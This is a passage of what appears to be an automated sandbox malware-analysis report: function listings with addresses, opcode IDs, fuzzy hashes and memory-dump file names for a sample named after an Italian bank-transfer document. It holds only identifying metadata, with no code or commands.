                                  • Instruction Fuzzy Hash: E011C2B2E016168F9B55EB798C445BFB7F7EFC8220B15852DE829D7380EF309A018760
                                  Function 06C0EC70 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24f76a1fdd8d81eb32579ce1b5ac9297d6c9a7c9487532883e03f5ce928d29d9
                                  • Instruction ID: 3adadb39479d48d14cda063c3f9a52be5a27c715635c4c36638eae25663a3659
                                  • Opcode Fuzzy Hash: 24f76a1fdd8d81eb32579ce1b5ac9297d6c9a7c9487532883e03f5ce928d29d9
                                  • Instruction Fuzzy Hash: 0D111970E49258DFEB44EFA9C5409AEBFF5AB4D310F149999D81897392D3319B41CF80
                                  Function 06C08DB4 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e241088192c0e38bd054db75a7cbd3921145070be26d44006b51731e4370c590
                                  • Instruction ID: c14185c81fde26564cac7e693b429c27512a863a506f753e58eabd5c4accbd9f
                                  • Opcode Fuzzy Hash: e241088192c0e38bd054db75a7cbd3921145070be26d44006b51731e4370c590
                                  • Instruction Fuzzy Hash: AB2103B59003499FDB50CF9AD844ADEBBF4FB48310F108419E919B7340C374A945CFA5
                                  Function 00BFD4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction ID: 387ae151d02beefdbb086a12eb533a57f4b25a0ce74c8af9698f46cf1b5fa589
                                  • Opcode Fuzzy Hash: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction Fuzzy Hash: CE11D376504284CFCF16CF14D5C4B26BFB2FB94314F24C6A9D9450B656C336D85ACBA2
                                  Function 00BFD3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction ID: 973ecca2d25db0f652e0c7c741af340f3b1b32b75a9a6f9e5afbc217eeba64ab
                                  • Opcode Fuzzy Hash: c66b0579d1dc232cfd297306288cbc48c9e04d1145202a0d0095b54c44be8674
                                  • Instruction Fuzzy Hash: 9C110372504244CFCB02CF04D5C0B26BFB2FB94324F24C6A9D9490B756C33AE85ACBA2
                                  Function 06C05778 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9fb29aeb9ccce2c429200f24daae46df6f36d8b38e3eed13866921382e509c9
                                  • Instruction ID: d9db972400e120a8773955c21f8d518202f93a348dd6ea3584edfd6d22cfb9e8
                                  • Opcode Fuzzy Hash: d9fb29aeb9ccce2c429200f24daae46df6f36d8b38e3eed13866921382e509c9
                                  • Instruction Fuzzy Hash: 421118B8D15208EFDB80DFA9D94569EFBB5AF48300F1084AAD828E7391E7705A44DF91
                                  Function 06C01B10 Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c61af40c97b772eda17566f48128550a895e012d3347088d4969a4d4e7c18cc
                                  • Instruction ID: adab54145cad85678eeed6b411e95743b617cf52a03a6b75a06aa55f3d745991
                                  • Opcode Fuzzy Hash: 1c61af40c97b772eda17566f48128550a895e012d3347088d4969a4d4e7c18cc
                                  • Instruction Fuzzy Hash: 7E116A32910B5286DB01DF59D850291B365FF95324F19977ADC4D3F30AEB71798487A0
                                  Function 00C0D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b893be8abb01456dc092d417a67761f1ad257a952e1dac794a5e58dc54f31fa7
                                  • Instruction ID: aeb5b983dd37877a318272a659f08d3ee296432334730a1de883c20e6b42b407
                                  • Opcode Fuzzy Hash: b893be8abb01456dc092d417a67761f1ad257a952e1dac794a5e58dc54f31fa7
                                  • Instruction Fuzzy Hash: F211DD75504280DFCB02CF54C5C0B15FBB1FB84314F24C6ADD84A4B696C33AD94ACB61
                                  Function 06C06108 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f4a1f9a1c2bdd8258e66e68b6f112dacb5776e2df9441fc5da30b5da987d04d
                                  • Instruction ID: be6717f2dc45df115a7d7cc9db281440b94b095c7c46c7b75231f1a088e1d7bb
                                  • Opcode Fuzzy Hash: 5f4a1f9a1c2bdd8258e66e68b6f112dacb5776e2df9441fc5da30b5da987d04d
                                  • Instruction Fuzzy Hash: 8C1130B060A505EFE7819F17F4506217BB2F709306B1154D6D58A8F282EA33C9768786
                                  Function 06C0EF78 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 014b5e309f7f055d98d59ac41e509e2534cc2d24acab0721d5c5c01d41d8f256
                                  • Instruction ID: 83ca5cf636454cadb9b050f95a33dc937cfc0edb6519bcc853c31a9a8763fd4d
                                  • Opcode Fuzzy Hash: 014b5e309f7f055d98d59ac41e509e2534cc2d24acab0721d5c5c01d41d8f256
                                  • Instruction Fuzzy Hash: 330192B4D09208DFEB44CF65E5405EDBBB9FB4E301F0491AAD8099B792D3309A41CF80
                                  Function 06C057D0 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3d1b986884e6f3bf069da7b08da78d23b9881831d16e2b574ab91d5a461f45e
                                  • Instruction ID: b30d563a316b4c5a0223e99d1d5b8523a968f20fecb003964e152faa5b8b4a01
                                  • Opcode Fuzzy Hash: b3d1b986884e6f3bf069da7b08da78d23b9881831d16e2b574ab91d5a461f45e
                                  • Instruction Fuzzy Hash: 800178B4D05208EFDB80CFA9DA842ADBFB5EB45300F0485AED828A7390E7340B40CF51
                                  Function 06C06118 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c57283c1f73c2f566796dda032eb3a24b0f067bcb88b6e45de2a83b92257ef28
                                  • Instruction ID: 91ba188f4b845c2d8efb09712c5ff7777ba3bfde25238ecb22f81db0b8c9ea3a
                                  • Opcode Fuzzy Hash: c57283c1f73c2f566796dda032eb3a24b0f067bcb88b6e45de2a83b92257ef28
                                  • Instruction Fuzzy Hash: 63015EB060A509EFE7C0DF57F4506217BB2F748306F2154D9D68A8B282EB33C9728B85
                                  Function 06C0EF88 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6ce1fd7001db26c9998a74303bd6efdb04d4dfca9aab7efec69cbe123745e18
                                  • Instruction ID: 43c9fd138c0e1a19c047f0b94156bf5f924184d4dae12231876084ff958be620
                                  • Opcode Fuzzy Hash: d6ce1fd7001db26c9998a74303bd6efdb04d4dfca9aab7efec69cbe123745e18
                                  • Instruction Fuzzy Hash: DD014FB4E49108DFEB44DF69E040AADBBBDFB8D301F1090A9D8099B381D7309A41CF80
                                  Function 06C02A01 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71912529565be62c45cf24a9c49d637c5f3549a7f8bb89f0aa180e7a77bfdbdc
                                  • Instruction ID: 8c85905da5eda5b6f0e2665953dce0d0f80a97acb31f4dd95d07266c0b88707e
                                  • Opcode Fuzzy Hash: 71912529565be62c45cf24a9c49d637c5f3549a7f8bb89f0aa180e7a77bfdbdc
                                  • Instruction Fuzzy Hash: 62F0F672B041109FFB306B35E848A2A37A6EF19364B1500BCE885C73A1DE25EF02C795
                                  Function 06C05819 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7905f5d5e7ab95bb0bc890f6113e46ea8db732eb3e2df4d85dadc9a778d7e2b
                                  • Instruction ID: 14f3b4fc041c159733e41410b3bcf8ac33e775bf1be1fb3112694099fd98690a
                                  • Opcode Fuzzy Hash: a7905f5d5e7ab95bb0bc890f6113e46ea8db732eb3e2df4d85dadc9a778d7e2b
                                  • Instruction Fuzzy Hash: C4015AB0D04218EFCB54DFBCD44469DBFB0EB05210F1086AED82897391E7315980CF91
                                  Function 06C06080 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 496de2a935b3938be17c407b8b18881ccc445bd1be5781a0acbd2c36b1a6f361
                                  • Instruction ID: cb119716b8b04001c4fc16daaf750b284da237973e92f5ad95c766ea71f4da9e
                                  • Opcode Fuzzy Hash: 496de2a935b3938be17c407b8b18881ccc445bd1be5781a0acbd2c36b1a6f361
                                  • Instruction Fuzzy Hash: FA0117B0102F04CFC324DF1AE184552BBF1FF887017419999D1CA8BA64EB72F424CB44
                                  Function 06C02A10 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86fabfa69c733b442a253b241fe2845cae9e8882960c5058dd724ee1186736f3
                                  • Instruction ID: de2f24a122ebc98ab00bc6eebc0a2f617e8160c2f6e7fda88407e9e3fc2a6389
                                  • Opcode Fuzzy Hash: 86fabfa69c733b442a253b241fe2845cae9e8882960c5058dd724ee1186736f3
                                  • Instruction Fuzzy Hash: EEF090717045119FFB31AB3AE818A2A37E9EF492647140479E886C72A1DE25EA01CAA4
                                  Function 06C0F327 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be7f20eac9468912e20cb7befc6b5a18faf3566989831aee197e25f7e5a519c9
                                  • Instruction ID: 663e0762cfda152ae10ebc3bc1a38956e55ccc838bb598b766f15b8e6fe933bc
                                  • Opcode Fuzzy Hash: be7f20eac9468912e20cb7befc6b5a18faf3566989831aee197e25f7e5a519c9
                                  • Instruction Fuzzy Hash: 521157B89052688FDB61CF68C990B9CBBB1BB09310F1082DAEA4DA7251D7349E848F10
                                  Function 06C02F5B Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 668d8041983b0c629d90f78e5f7dc4cc09a1455b812e88eb47e6039ecc6686f7
                                  • Instruction ID: c31f3252d918014b945a354716e2f82e052de8f2d608f96821679e96bd685b6f
                                  • Opcode Fuzzy Hash: 668d8041983b0c629d90f78e5f7dc4cc09a1455b812e88eb47e6039ecc6686f7
                                  • Instruction Fuzzy Hash: 87F050322082955FCB038B29D81079E7FE6DF8F310F05449BF848C7162C5759C15D761
                                  Function 06C0A5B2 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8fae2e8f5649b29671706e5720c58d7bc633956c7619d6f62f376ea672b68148
                                  • Instruction ID: 9470d73d22e6c3c78fac410357a60520d917a09d3ff531a48c3a99773004e0e3
                                  • Opcode Fuzzy Hash: 8fae2e8f5649b29671706e5720c58d7bc633956c7619d6f62f376ea672b68148
                                  • Instruction Fuzzy Hash: 80F0A732600109BF9F44DF58DC41C9E7FAAEF08210B14C17AE409E7351D630DD508B94
                                  Function 06C03EF0 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2708428958e1523384e87b1c6eaa0735343d1d5d56c9e3539ef25c699725ef02
                                  • Instruction ID: b21c0cb9dc76455b4326fb4554a225a82394137adae8723349a18ba7cda59052
                                  • Opcode Fuzzy Hash: 2708428958e1523384e87b1c6eaa0735343d1d5d56c9e3539ef25c699725ef02
                                  • Instruction Fuzzy Hash: B4E0D873B155510BD7245509EC50AAD679BDFCD721B5E40F5D508CB7A2DC258D038391
                                  Function 06C02F70 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d92735ea9982dc542b04f961ab2d5e0d8dbcaebe00a58ba645cf2c2f13c235cf
                                  • Instruction ID: b70fd98886624b0d0a9c0db2eeb6c3d968a8e3994b27db630f17930323d780e0
                                  • Opcode Fuzzy Hash: d92735ea9982dc542b04f961ab2d5e0d8dbcaebe00a58ba645cf2c2f13c235cf
                                  • Instruction Fuzzy Hash: C6E092323001486BCB029A59E800EAF7FDEDBCD321B04851AF949C7161CAB5E92197A0
                                  Function 06C03F00 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ea5c4b3d8f92f47adc79c7544a8299b177507c7d3b169d64c06d7c6b985d0e8
                                  • Instruction ID: 7500ba331e6deb32092d496c89806f2162c3bc9bb941acb2a33d3f0a4993faa6
                                  • Opcode Fuzzy Hash: 3ea5c4b3d8f92f47adc79c7544a8299b177507c7d3b169d64c06d7c6b985d0e8
                                  • Instruction Fuzzy Hash: 6EE0C2323655520BDA28A50DE80096D729FDFC9A21B1940FAE108CBBA2CD35DC028390
                                  Function 06C03691 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d88e1a97741b7c5f43c602f69b99082143a4bb3a5920cbd5330ff4269360bcb
                                  • Instruction ID: c02c804637fc299e0eb7230bfc6016ec273168bab6f3fa47a27f611d50f81464
                                  • Opcode Fuzzy Hash: 0d88e1a97741b7c5f43c602f69b99082143a4bb3a5920cbd5330ff4269360bcb
                                  • Instruction Fuzzy Hash: 2BE08672E14120CFE7485B39D858BA83795AB58725F0600BDD40D973E2CE644D41CBC2
                                  Function 06C0B050 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b32b89fc96265691163808e4fdb389b8078ed8c2d0da57f34b45bd86dd421d21
                                  • Instruction ID: 07c036e042107b97768067db4f0b1e06cc46096bfda68b5e8d3c0b84f8c3c499
                                  • Opcode Fuzzy Hash: b32b89fc96265691163808e4fdb389b8078ed8c2d0da57f34b45bd86dd421d21
                                  • Instruction Fuzzy Hash: 12E01AB1D4525CEFDB94DFA9E40579DFBF4EB54300F1041BD892893280E6755A50CB81
                                  Function 06C0D880 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ffc40a9c316a84816ae36141c63c4b17571d5b834aacb4e12ad1f9472f1f583
                                  • Instruction ID: 6c71fc623c190cdd1e19637bfb663641218e5ae1075fb34ecab4602b682e82ac
                                  • Opcode Fuzzy Hash: 4ffc40a9c316a84816ae36141c63c4b17571d5b834aacb4e12ad1f9472f1f583
                                  • Instruction Fuzzy Hash: 2BD05BB004B3486FD2151765BC1E6957F6E9B03211F050056FB9D468D24B141545C7F7
                                  Function 06C08D15 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8176593a35500f79ce59f169c591b6781d54b9ecccfa8c4ed5752821877eb12a
                                  • Instruction ID: 796d0591f18a21cfcd354d9ce26f156a62cb290e0580133981d08df7262287cd
                                  • Opcode Fuzzy Hash: 8176593a35500f79ce59f169c591b6781d54b9ecccfa8c4ed5752821877eb12a
                                  • Instruction Fuzzy Hash: 8AE07D7080F3409ED38353750C7D56D7F119F62704709C84BC24C0D0EB90504516830B
                                  Function 06C078A8 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ed7137f44024ca22305f4a59df147402fe1567d891bb1129b13f453243466e5
                                  • Instruction ID: 7c91ebd6c108262df90c98f08cd16e43fe154267e692ebea8e14bc8dcd39764f
                                  • Opcode Fuzzy Hash: 2ed7137f44024ca22305f4a59df147402fe1567d891bb1129b13f453243466e5
                                  • Instruction Fuzzy Hash: B2E0EDB0D0020CEFCB44EFA8C4406AEBBB5FB44300F1085AAD914A3340E7715691DB95
                                  Function 06C05160 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b19e7f2f58f08febbdf5cb1abc72b14d53b4d89c3c36f2434c1c7db58a528cec
                                  • Instruction ID: c0fa82e80b615004b1d3a12e64cc471d483cce43db63204d8d30c962a27deb91
                                  • Opcode Fuzzy Hash: b19e7f2f58f08febbdf5cb1abc72b14d53b4d89c3c36f2434c1c7db58a528cec
                                  • Instruction Fuzzy Hash: E2E0C270C4924CEFC360EFB89D16AAD7FB54B12200F5444EE8A049B2E2F6304E80C7A2
                                  Function 06C0BA10 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 990504242f5d8c63ce7bf0bc937ca00f4aed2a26e6221a41b0ae021af593a6db
                                  • Instruction ID: 67146214239a100ef936caaefe826cbace114be45dbeb050bd1a8c9b13cceae9
                                  • Opcode Fuzzy Hash: 990504242f5d8c63ce7bf0bc937ca00f4aed2a26e6221a41b0ae021af593a6db
                                  • Instruction Fuzzy Hash: CFE09274E10208EFCB80DFADD448A9CBBF4EB48610F1080EAD918D73A0E6359A40CF41
                                  Function 06C036A0 Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eba458d4233ae557c89c01a1fedb868519737f3e04606a6c70e897fb2f2dab1a
                                  • Instruction ID: aaa6541c6c6371c8d48cb440a9dccb0d722d65d35c52e6b2d6f4cbf84f148c1e
                                  • Opcode Fuzzy Hash: eba458d4233ae557c89c01a1fedb868519737f3e04606a6c70e897fb2f2dab1a
                                  • Instruction Fuzzy Hash: 39D01730B546248BD718AB39D418BA933DAAB88725F0404AAE10AC73A2CE64AC41CB90
                                  Function 06C057E0 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ff93781fa57d323c7cc3a42b21cf1adc1d88886f81643174b1e2f22916d6d74
                                  • Instruction ID: bdd134eb31ee814fe8614a732935590691305622fda143ec6972e84fa7d44130
                                  • Opcode Fuzzy Hash: 8ff93781fa57d323c7cc3a42b21cf1adc1d88886f81643174b1e2f22916d6d74
                                  • Instruction Fuzzy Hash: D7E0E2B0D00208EFCB80EFADD54429CBBF4AB44200F0084AA8828A3290EA345A80CF81
                                  Function 06C0B060 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
